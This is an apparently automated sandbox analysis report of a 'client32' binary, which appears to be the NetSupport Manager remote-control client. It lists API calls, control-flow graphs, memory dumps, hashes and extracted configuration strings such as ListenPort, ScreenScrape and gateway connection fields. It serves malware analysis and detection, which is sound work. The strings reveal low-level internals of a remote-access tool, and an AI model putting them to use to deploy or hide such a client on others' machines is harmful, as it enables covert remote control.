                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2349140579-0
                                                                                                                                                                                                    • Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                                                                                    • Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61
                                                                                                                                                                                                    Function 1109C7E0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                    • Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                                                                                    • Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64
                                                                                                                                                                                                    Function 1102E15E Relevance: 211.5, APIs: 31, Strings: 89, Instructions: 1502COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102E234
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEventMetricsSystem
                                                                                                                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$305090$@r$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
                                                                                                                                                                                                    • API String ID: 1866202007-3167175283
                                                                                                                                                                                                    • Opcode ID: a0e9e5a4652df17d14e2c7ced784bb22a0bb21b6b50456f220e0995e75fb437e
                                                                                                                                                                                                    • Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e9e5a4652df17d14e2c7ced784bb22a0bb21b6b50456f220e0995e75fb437e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52
                                                                                                                                                                                                    Function 1102D5B0 Relevance: 81.1, APIs: 15, Strings: 31, Instructions: 630COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1025 1102d5b0-1102d600 call 1110c420 1028 1102d602-1102d616 call 1113f0c0 1025->1028 1029 1102d618 1025->1029 1031 1102d61e-1102d663 call 1113e8f0 call 1113f130 1028->1031 1029->1031 1037 1102d803-1102d812 call 11141430 1031->1037 1038 1102d669 1031->1038 1046 1102d818-1102d828 1037->1046 1040 1102d670-1102d673 1038->1040 1042 1102d675-1102d677 1040->1042 1043 1102d698-1102d6a1 1040->1043 1047 1102d680-1102d691 1042->1047 1044 1102d6a7-1102d6ae 1043->1044 1045 1102d7d4-1102d7ed call 1113f130 1043->1045 1044->1045 1048 1102d7a3-1102d7b8 call 1115f5b7 1044->1048 1049 1102d6b5-1102d6b7 1044->1049 1050 1102d7ba-1102d7cf call 1115f5b7 1044->1050 1051 1102d74a-1102d77d call 1115e091 call 1113e8f0 1044->1051 1052 1102d78b-1102d7a1 call 11160790 1044->1052 1053 1102d73b-1102d745 1044->1053 1054 1102d77f-1102d789 1044->1054 1055 1102d6fc-1102d702 1044->1055 1056 1102d72c-1102d736 1044->1056 1045->1040 1073 1102d7f3-1102d7f5 1045->1073 1058 1102d82a 1046->1058 1059 1102d82f-1102d843 call 1102c850 1046->1059 1047->1047 1060 1102d693 1047->1060 1048->1045 1049->1045 1062 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1049->1062 1050->1045 1051->1045 1052->1045 1053->1045 1054->1045 1064 1102d704-1102d718 call 1115f5b7 1055->1064 1065 1102d71d-1102d727 1055->1065 1056->1045 1058->1059 1076 1102d848-1102d84d 1059->1076 1060->1045 1062->1045 1064->1045 1065->1045 1079 1102d8f3-1102d90d call 111429e0 1073->1079 1080 1102d7fb-1102d801 1073->1080 1076->1079 1082 1102d853-1102d878 call 110b6bd0 call 11142a60 1076->1082 1092 1102d963-1102d96f call 1102b120 1079->1092 1093 1102d90f-1102d928 call 1105d340 1079->1093 1080->1037 1080->1046 1100 1102d883-1102d889 1082->1100 1101 1102d87a-1102d881 1082->1101 1105 1102d971-1102d978 1092->1105 1106 1102d948-1102d94f 1092->1106 1093->1092 1104 1102d92a-1102d93c 1093->1104 1107 1102d88b-1102d892 call 110279d0 1100->1107 1108 1102d8e9 1100->1108 1101->1079 1104->1092 1124 1102d93e 1104->1124 1109 1102d955-1102d958 1105->1109 1110 1102d97a-1102d984 1105->1110 1106->1109 1112 1102db5a-1102db7b GetComputerNameA 1106->1112 1107->1108 1123 1102d894-1102d8c6 1107->1123 1108->1079 1114 1102d95a-1102d961 call 110b6bd0 1109->1114 1115 1102d989 1109->1115 1110->1112 1117 1102dbb3-1102dbb9 1112->1117 1118 1102db7d-1102dbb1 call 110278a0 1112->1118 1122 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1114->1122 1115->1122 1120 1102dbbb-1102dbc0 1117->1120 1121 1102dbef-1102dc02 call 11160790 1117->1121 1118->1117 1144 1102dc07-1102dc13 1118->1144 1125 1102dbc6-1102dbca 1120->1125 1139 1102ddf7-1102de1a 1121->1139 1172 1102db2a-1102db32 SetLastError 1122->1172 1173 1102da6c-1102da83 1122->1173 1141 1102d8d0-1102d8df call 110f3da0 1123->1141 1142 1102d8c8-1102d8ce 1123->1142 1124->1106 1130 1102dbe6-1102dbe8 1125->1130 1131 1102dbcc-1102dbce 1125->1131 1138 1102dbeb-1102dbed 1130->1138 1136 1102dbe2-1102dbe4 1131->1136 1137 1102dbd0-1102dbd6 1131->1137 1136->1138 1137->1130 1145 1102dbd8-1102dbe0 1137->1145 1138->1121 1138->1144 1156 1102de42-1102de4a 1139->1156 1157 1102de1c-1102de22 1139->1157 1147 1102d8e2-1102d8e4 call 1102cde0 1141->1147 1142->1141 1142->1147 1151 1102dc15-1102dc2a call 110b6bd0 call 11029870 1144->1151 1152 1102dc2c-1102dc3f call 11080b10 1144->1152 1145->1125 1145->1136 1147->1108 1179 1102dc83-1102dc9c call 11080b10 1151->1179 1169 1102dc41-1102dc64 1152->1169 1170 1102dc66-1102dc68 1152->1170 1161 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1156->1161 1162 1102de4c-1102de59 call 1113f120 call 1115e091 1156->1162 1157->1156 1160 1102de24-1102de3d call 1102cde0 1157->1160 1160->1156 1162->1161 1169->1179 1178 1102dc70-1102dc81 1170->1178 1181 1102daf3-1102daff 1172->1181 1173->1181 1193 1102da85-1102da8e 1173->1193 1178->1178 1178->1179 1201 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1179->1201 1202 1102dddc-1102dde9 call 11160790 1179->1202 1186 1102db42-1102db51 1181->1186 1187 1102db01-1102db0d 1181->1187 1186->1112 1195 1102db53-1102db54 FreeLibrary 1186->1195 1191 1102db1f-1102db23 1187->1191 1192 1102db0f-1102db1d GetProcAddress 1187->1192 1198 1102db34-1102db36 SetLastError 1191->1198 1199 1102db25-1102db28 1191->1199 1192->1191 1193->1181 1197 1102da90-1102dac6 call 11142a60 call 11128350 1193->1197 1195->1112 1197->1181 1221 1102dac8-1102daee call 11142a60 call 11027590 1197->1221 1205 1102db3c 1198->1205 1199->1205 1237 1102dd33-1102dd49 call 11125f90 1201->1237 1238 1102dd1f-1102dd2e call 110290f0 1201->1238 1214 1102ddec-1102ddf1 CharUpperA 1202->1214 1205->1186 1214->1139 1221->1181 1242 1102dd62-1102dd9c call 110ce900 * 2 1237->1242 1243 1102dd4b-1102dd5d call 110ce900 1237->1243 1238->1237 1250 1102ddb2-1102ddda call 11160790 call 110ce4f0 1242->1250 1251 1102dd9e-1102ddad call 110290f0 1242->1251 1243->1242 1250->1214 1251->1250
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memsetwsprintf
                                                                                                                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 1984265443-3756774750
                                                                                                                                                                                                    • Opcode ID: 751978ab5b7e35652694628e66f30823bc1ffbebfd97f39c89f53af1c502ff7b
                                                                                                                                                                                                    • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 751978ab5b7e35652694628e66f30823bc1ffbebfd97f39c89f53af1c502ff7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61
                                                                                                                                                                                                    Function 685A3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1257 685a3d00-685a3d42 call 685b1c50 call 685a3b80 1261 685a3d47-685a3d4f 1257->1261 1262 685a3d6c-685a3d6e 1261->1262 1263 685a3d51-685a3d6b call 685b28e1 1261->1263 1265 685a3d70-685a3d84 call 68596f50 1262->1265 1266 685a3d87-685a3da1 call 68598fb0 1262->1266 1265->1266 1272 685a3da3-685a3dc4 call 685963c0 call 685b28e1 1266->1272 1273 685a3dc5-685a3e44 call 68595e90 * 2 call 685a7be0 call 68595e20 lstrlenA 1266->1273 1286 685a3e98-685a3fbe call 68595500 call 68596050 call 685a7c70 * 2 call 685a7d00 * 3 call 68595060 call 685a7d00 call 685b1bfd call 685a7d00 gethostname call 685a7d00 call 6859b8e0 1273->1286 1287 685a3e46-685a3e95 call 685ad8b0 call 68595060 call 68594830 call 685b1bfd 1273->1287 1322 685a3fc0 1286->1322 1323 685a3fc5-685a3fe1 call 685a7d00 1286->1323 1287->1286 1322->1323 1326 685a3ff8-685a3ffe 1323->1326 1327 685a3fe3-685a3ff5 call 685a7d00 1323->1327 1329 685a421a-685a4263 call 685a7b60 call 685b1bfd call 685998d0 call 685a77e0 1326->1329 1330 685a4004-685a4022 call 68595e20 1326->1330 1327->1326 1358 685a4292-685a42aa call 685b28e1 1329->1358 1359 685a4265-685a4291 call 6859a4e0 call 685b28e1 1329->1359 1337 685a405a-685a4084 call 68595e20 1330->1337 1338 685a4024-685a4057 call 68595060 call 685a7d00 call 685b1bfd 1330->1338 1347 685a408a-685a41ce call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd 1337->1347 1348 685a41d1-685a4217 call 685a7d00 call 68595e20 call 685a7d00 1337->1348 1338->1337 1347->1348 1348->1329
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                    • String ID: *Dept$*Gsk$1.1$305090$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                                                                                    • API String ID: 2102423945-3026469383
                                                                                                                                                                                                    • Opcode ID: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
                                                                                                                                                                                                    • Instruction ID: 44891fd80584a1afe0cb340a92391f0779c0d43f19a44a21a32dfc9e2d24338d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E182B6C4061CAACB21DB648C90FFFB778AF99205FC045D9E90963141EB356F848FA5
                                                                                                                                                                                                    Function 1113FBE0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1398 1113fbe0-1113fc21 GetModuleFileNameA 1399 1113fc63 1398->1399 1400 1113fc23-1113fc36 call 11080be0 1398->1400 1402 1113fc69-1113fc6d 1399->1402 1400->1399 1406 1113fc38-1113fc61 LoadLibraryA 1400->1406 1404 1113fc89-1113fca7 GetModuleHandleA GetProcAddress 1402->1404 1405 1113fc6f-1113fc7c LoadLibraryA 1402->1405 1408 1113fcb7-1113fce0 GetProcAddress * 4 1404->1408 1409 1113fca9-1113fcb5 1404->1409 1405->1404 1407 1113fc7e-1113fc86 LoadLibraryA 1405->1407 1406->1402 1407->1404 1410 1113fce3-1113fd5b GetProcAddress * 10 call 1115e4d1 1408->1410 1409->1410 1412 1113fd60-1113fd63 1410->1412
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,74DF23A0), ref: 1113FC13
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1113FC5C
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
                                                                                                                                                                                                      • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
